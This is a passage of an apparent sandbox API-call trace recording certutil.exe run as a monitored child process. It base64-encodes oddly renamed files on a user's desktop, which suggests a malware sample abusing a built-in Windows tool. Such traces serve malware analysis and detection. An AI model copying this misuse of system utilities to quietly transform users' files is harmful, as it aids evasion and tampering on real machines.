lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0276.948] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x155bfdcb5a0 [0276.948] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x155bfdcb5a0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0276.948] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x155bfdce3f0 [0276.948] _vsnwprintf (in: _Buffer=0x155bfdce3f0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x2935c7fc48 | out: _Buffer="10.0.15063.447 retail") returned 21 [0276.948] LocalFree (hMem=0x155bfdcb5a0) returned 0x0 [0276.948] LocalFree (hMem=0x155bfdce3b0) returned 0x0 [0276.948] LocalFree (hMem=0x155bfdce4b0) returned 0x0 [0276.948] LocalFree (hMem=0x155bfdce3f0) returned 0x0 [0276.949] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0276.949] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0276.949] GetStockObject (i=0) returned 0x900010 [0276.949] RegisterClassW (lpWndClass=0x2935c7fd70) returned 0xc1a2 [0276.949] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1f02c8 [0277.036] NtdllDefWindowProc_W () returned 0x0 [0277.036] NtdllDefWindowProc_W () returned 0x1 [0277.046] NtdllDefWindowProc_W () returned 0x0 [0277.060] UpdateWindow (hWnd=0x1f02c8) returned 1 [0277.060] PostMessageW (hWnd=0x1f02c8, Msg=0x400, wParam=0x0, lParam=0x155bfdb217e) returned 1 [0277.060] GetMessageW (in: lpMsg=0x2935c7fdc0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2935c7fdc0) returned 1 [0277.060] TranslateMessage (lpMsg=0x2935c7fdc0) returned 0 [0277.060] DispatchMessageW (lpMsg=0x2935c7fdc0) returned 0x0 [0277.060] NtdllDefWindowProc_W () returned 0x0 [0277.060] GetMessageW (in: lpMsg=0x2935c7fdc0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2935c7fdc0) returned 1 [0277.060] TranslateMessage (lpMsg=0x2935c7fdc0) returned 0 [0277.060] DispatchMessageW (lpMsg=0x2935c7fdc0) returned 0x0 [0277.060] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x155bfdb4420 [0277.060] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x155bfdb9170 [0277.061] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0277.061] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0277.061] SetLastError (dwErrCode=0x80070716) [0277.061] _vsnwprintf (in: _Buffer=0x2935c7f7c8, _BufferCount=0xb, _Format="%d", _ArgList=0x2935c7f7b8 | out: _Buffer="465") returned 3 [0277.061] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x2935c7f580, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0277.061] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x155bfdc2280 [0277.061] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0277.061] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0277.061] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x2935c7f560, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0277.061] GetLastError () returned 0xcb [0277.062] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0277.062] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0277.062] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0277.062] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0277.062] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0277.062] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0277.062] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0277.062] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0277.062] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0277.062] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0277.062] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0277.062] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0277.062] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0277.062] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0277.062] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0277.062] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0277.062] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0277.062] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0277.062] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0277.063] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0277.063] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0277.063] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x2935c7f228 | out: phkResult=0x2935c7f228*=0x23c) returned 0x0 [0277.063] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x155bfdbae50 [0277.063] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x2935c7f798, lpData=0x2935c7f7c8, lpcbData=0x2935c7f790*=0x4 | out: lpType=0x2935c7f798*=0x0, lpData=0x2935c7f7c8*=0x0, lpcbData=0x2935c7f790*=0x4) returned 0x2 [0277.063] LocalFree (hMem=0x155bfdbae50) returned 0x0 [0277.063] RegCloseKey (hKey=0x23c) returned 0x0 [0277.063] LocalFree (hMem=0x0) returned 0x0 [0277.063] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x155bfddc6a0 [0277.113] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0277.113] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0277.113] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0277.113] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0277.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0277.114] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x155bfde1590 [0277.114] GetComputerNameW (in: lpBuffer=0x155bfde1590, nSize=0x2935c7f790 | out: lpBuffer="NQDPDE", nSize=0x2935c7f790) returned 1 [0277.115] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x2935c7f760 | out: lpBuffer=0x0, nSize=0x2935c7f760) returned 0 [0277.115] GetLastError () returned 0xea [0277.115] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x155bfdcb720 [0277.115] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x155bfdcb720, nSize=0x2935c7f760 | out: lpBuffer="NQdPdE", nSize=0x2935c7f760) returned 1 [0277.115] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0277.121] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x155bfde17e0, cbCertEncoded=0x81a5) returned 0x0 [0277.125] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x155bfde17e0, cbCrlEncoded=0x81a5) returned 0x0 [0277.125] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x155bfde17e0, cbEncoded=0x81a5, dwFlags=0x8000, pDecodePara=0x2935c7f640, pvStructInfo=0x2935c7f6d0, pcbStructInfo=0x2935c7f6c4 | out: pvStructInfo=0x2935c7f6d0, pcbStructInfo=0x2935c7f6c4) returned 0 [0277.125] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x155bfde17e0, cbEncoded=0x81a5, dwFlags=0x8000, pDecodePara=0x2935c7f640, pvStructInfo=0x2935c7f6d0, pcbStructInfo=0x2935c7f6c4 | out: pvStructInfo=0x2935c7f6d0, pcbStructInfo=0x2935c7f6c4) returned 0 [0277.126] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x155bfde17e0, cbEncoded=0x81a5, dwFlags=0x8000, pDecodePara=0x2935c7f640, pvStructInfo=0x2935c7f6d0, pcbStructInfo=0x2935c7f6c4 | out: pvStructInfo=0x2935c7f6d0, pcbStructInfo=0x2935c7f6c4) returned 0 [0277.126] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x155bfdc2ce0 [0277.137] CryptMsgUpdate (hCryptMsg=0x155bfdc2ce0, pbData=0x155bfde17e0, cbData=0x81a5, fFinal=1) returned 0 [0277.137] GetLastError () returned 0x8009310b [0277.137] CryptMsgClose (hCryptMsg=0x155bfdc2ce0) returned 1 [0277.137] GetFileAttributesExW (in: lpFileName="Z31qy U6YA31zG.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\z31qy u6ya31zg.bmp.sister"), fInfoLevelId=0x0, lpFileInformation=0x2935c7f6f0 | out: lpFileInformation=0x2935c7f6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c0f1650, ftCreationTime.dwHighDateTime=0x1d5e376, ftLastAccessTime.dwLowDateTime=0x16dfbdd0, ftLastAccessTime.dwHighDateTime=0x1d5e0d7, ftLastWriteTime.dwLowDateTime=0x16dfbdd0, ftLastWriteTime.dwHighDateTime=0x1d5e0d7, nFileSizeHigh=0x0, nFileSizeLow=0x81a5)) returned 1 [0277.137] _vsnwprintf (in: _Buffer=0x2935c7f6f8, _BufferCount=0xb, _Format="%d", _ArgList=0x2935c7f6e8 | out: _Buffer="359") returned 3 [0277.137] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x2935c7f4b0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0277.137] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x155bfde1200 [0277.138] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0277.138] _vsnwprintf (in: _Buffer=0x2935c7e6e0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x2935c7f738 | out: _Buffer="Input Length = 33189") returned 20 [0277.138] GetFileType (hFile=0x50) returned 0x2 [0277.138] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2935c7e6e0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x2935c7e694, lpReserved=0x0 | out: lpBuffer=0x2935c7e6e0*, lpNumberOfCharsWritten=0x2935c7e694*=0x14) returned 1 [0277.242] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0277.242] _vsnwprintf (in: _Buffer=0x2935c7e6e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x2935c7f738 | out: _Buffer="\n") returned 1 [0277.242] GetFileType (hFile=0x50) returned 0x2 [0277.242] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2935c7e6e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2935c7e694, lpReserved=0x0 | out: lpBuffer=0x2935c7e6e0*, lpNumberOfCharsWritten=0x2935c7e694*=0x1) returned 1 [0277.420] GetFileAttributesExW (in: lpFileName="Z31qy U6YA31zG.bmp.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\z31qy u6ya31zg.bmp.cruel"), fInfoLevelId=0x0, lpFileInformation=0x2935c7f6f0 | out: lpFileInformation=0x2935c7f6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe7c70a, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xcfe7c70a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xcfeeb1ae, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xb27c)) returned 1 [0277.420] _vsnwprintf (in: _Buffer=0x2935c7f6f8, _BufferCount=0xb, _Format="%d", _ArgList=0x2935c7f6e8 | out: _Buffer="361") returned 3 [0277.420] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x2935c7f4b0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0277.420] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x155bfde14d0 [0277.421] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0277.421] _vsnwprintf (in: _Buffer=0x2935c7e6e0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x2935c7f738 | out: _Buffer="Output Length = 45692") returned 21 [0277.421] GetFileType (hFile=0x50) returned 0x2 [0277.421] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2935c7e6e0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x2935c7e694, lpReserved=0x0 | out: lpBuffer=0x2935c7e6e0*, lpNumberOfCharsWritten=0x2935c7e694*=0x15) returned 1 [0277.535] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0277.535] _vsnwprintf (in: _Buffer=0x2935c7e6e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x2935c7f738 | out: _Buffer="\n") returned 1 [0277.535] GetFileType (hFile=0x50) returned 0x2 [0277.535] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2935c7e6e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2935c7e694, lpReserved=0x0 | out: lpBuffer=0x2935c7e6e0*, lpNumberOfCharsWritten=0x2935c7e694*=0x1) returned 1 [0277.616] LocalFree (hMem=0x155bfde17e0) returned 0x0 [0277.617] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0277.617] _vsnwprintf (in: _Buffer=0x2935c7f758, _BufferCount=0xb, _Format="%d", _ArgList=0x2935c7f748 | out: _Buffer="2022") returned 4 [0277.617] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x2935c7f510, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0277.617] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x155bfdb8bb0 [0277.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0277.617] _vsnwprintf (in: _Buffer=0x2935c7e740, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x2935c7f798 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0277.617] GetFileType (hFile=0x50) returned 0x2 [0277.617] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2935c7e740*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x2935c7e6f4, lpReserved=0x0 | out: lpBuffer=0x2935c7e740*, lpNumberOfCharsWritten=0x2935c7e6f4*=0x31) returned 1 [0277.688] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0277.688] _vsnwprintf (in: _Buffer=0x2935c7e740, _BufferCount=0x1ff, _Format="\n", _ArgList=0x2935c7f798 | out: _Buffer="\n") returned 1 [0277.688] GetFileType (hFile=0x50) returned 0x2 [0277.688] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2935c7e740*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2935c7e6f4, lpReserved=0x0 | out: lpBuffer=0x2935c7e740*, lpNumberOfCharsWritten=0x2935c7e6f4*=0x1) returned 1 [0277.803] LocalFree (hMem=0x0) returned 0x0 [0277.803] LocalFree (hMem=0x155bfdb9170) returned 0x0 [0277.803] LocalFree (hMem=0x155bfdb4420) returned 0x0 [0277.803] SetLastError (dwErrCode=0x80070716) [0277.804] _vsnwprintf (in: _Buffer=0x2935c7f7c8, _BufferCount=0xb, _Format="%d", _ArgList=0x2935c7f7b8 | out: _Buffer="511") returned 3 [0277.804] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x2935c7f580, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0277.804] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x155bfde1110 [0277.804] PostQuitMessage (nExitCode=0) [0277.805] GetMessageW (in: lpMsg=0x2935c7fdc0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2935c7fdc0) returned 0 [0277.805] LocalFree (hMem=0x155bfdcb720) returned 0x0 [0277.805] LocalFree (hMem=0x155bfde1590) returned 0x0 [0277.805] LocalFree (hMem=0x0) returned 0x0 [0277.805] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0277.806] GetLastError () returned 0x7e [0277.806] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0277.807] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0277.807] DllMain () returned 0x1 [0277.807] LocalFree (hMem=0x155bfdcb6a0) returned 0x0 [0277.807] LocalFree (hMem=0x155bfdc2280) returned 0x0 [0277.807] LocalFree (hMem=0x155bfde1200) returned 0x0 [0277.807] LocalFree (hMem=0x155bfde14d0) returned 0x0 [0277.807] LocalFree (hMem=0x155bfdb8bb0) returned 0x0 [0277.807] LocalFree (hMem=0x155bfde1110) returned 0x0 [0277.807] LocalFree (hMem=0x155bfdc4070) returned 0x0 [0277.807] LocalFree (hMem=0x155bfdc21f0) returned 0x0 [0277.807] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0277.807] GetLastError () returned 0x7e [0277.807] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0277.808] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0277.808] DllMain () returned 0x1 [0277.808] exit (_Code=0) Thread: id = 103 os_tid = 0x824 Process: id = "39" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1278b000" os_pid = "0x728" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"zfOV4.swf.Sister\" \"zfOV4.swf.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 104 os_tid = 0x12f4 [0279.941] GetStartupInfoW (in: lpStartupInfo=0xece0d8fd80 | out: lpStartupInfo=0xece0d8fd80*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"zfOV4.swf.Sister\" \"zfOV4.swf.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0279.943] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0279.943] __set_app_type (_Type=0x1) [0279.943] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0279.943] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0279.946] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0279.946] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0279.947] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0279.947] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0279.947] WerSetFlags () returned 0x0 [0279.948] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0279.948] __iob_func () returned 0x7ffcea2dea00 [0279.948] _fileno (_File=0x7ffcea2dea30) returned 1 [0279.948] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0279.948] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0279.950] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0279.950] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0279.950] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0279.950] GetConsoleOutputCP () returned 0x1b5 [0280.020] _vsnwprintf (in: _Buffer=0xece0d8fcf0, _BufferCount=0xb, _Format=".%d", _ArgList=0xece0d8fc18 | out: _Buffer=".437") returned 4 [0280.021] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0280.021] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0280.021] GetFileType (hFile=0x50) returned 0x2 [0280.021] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0280.021] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0280.021] SetThreadUILanguage (LangId=0x0) returned 0x409 [0280.090] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0280.090] GetCommandLineW () returned="certutil -encode \"zfOV4.swf.Sister\" \"zfOV4.swf.Cruel\"" [0280.090] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2d32312b350 [0280.090] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2d32311af00 [0280.091] LocalFree (hMem=0x2d32312b350) returned 0x0 [0280.091] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2d323122600 [0280.091] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2d3231221e0 [0280.091] LocalFree (hMem=0x2d323122600) returned 0x0 [0280.091] LocalFree (hMem=0x2d32311af00) returned 0x0 [0280.091] LocalFree (hMem=0x0) returned 0x0 [0280.091] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0280.091] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0280.092] GetCommandLineW () returned="certutil -encode \"zfOV4.swf.Sister\" \"zfOV4.swf.Cruel\"" [0280.092] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2d32312b330 [0280.092] GetSystemTime (in: lpSystemTime=0xece0d8f9e0 | out: lpSystemTime=0xece0d8f9e0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x36, wMilliseconds=0x279)) [0280.092] SystemTimeToFileTime (in: lpSystemTime=0xece0d8f9e0, lpFileTime=0xece0d8f9d8 | out: lpFileTime=0xece0d8f9d8) returned 1 [0280.092] FileTimeToLocalFileTime (in: lpFileTime=0xece0d8f9d8, lpLocalFileTime=0xece0d8f9a0 | out: lpLocalFileTime=0xece0d8f9a0) returned 1 [0280.092] FileTimeToSystemTime (in: lpFileTime=0xece0d8f9a0, lpSystemTime=0xece0d8f710 | out: lpSystemTime=0xece0d8f710) returned 1 [0280.092] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xece0d8f710, lpFormat=0x0, lpDateStr=0xece0d8f820, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0280.093] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xece0d8f710, lpFormat=0x0, lpTimeStr=0xece0d8f720, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0280.093] _vsnwprintf (in: _Buffer=0xece0d8f72e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xece0d8f6f8 | out: _Buffer=" 54.633s") returned 8 [0280.093] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2d32312e110 [0280.093] SetLastError (dwErrCode=0x80070716) [0280.093] _vsnwprintf (in: _Buffer=0xece0d8f7a8, _BufferCount=0xb, _Format="%d", _ArgList=0xece0d8f798 | out: _Buffer="948") returned 3 [0280.093] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xece0d8f560, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0280.093] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2d32312b310 [0280.093] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2d323120990 [0280.093] LocalFree (hMem=0x2d32312e110) returned 0x0 [0280.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xece0d8fa50 | out: lpSystemTimeAsFileTime=0xece0d8fa50*(dwLowDateTime=0xd18eb9bf, dwHighDateTime=0x1d6141f)) [0280.094] GetLocalTime (in: lpSystemTime=0xece0d8fa88 | out: lpSystemTime=0xece0d8fa88*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x36, wMilliseconds=0x27a)) [0280.094] SystemTimeToFileTime (in: lpSystemTime=0xece0d8fa88, lpFileTime=0xece0d8fa60 | out: lpFileTime=0xece0d8fa60) returned 1 [0280.094] CompareFileTime (lpFileTime1=0xece0d8fa60, lpFileTime2=0xece0d8fa50) returned 1 [0280.094] _vsnwprintf (in: _Buffer=0xece0d8fa98, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xece0d8fa28 | out: _Buffer="GMT + 2.00") returned 10 [0280.094] LocalFree (hMem=0x2d32312b330) returned 0x0 [0280.094] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0280.094] 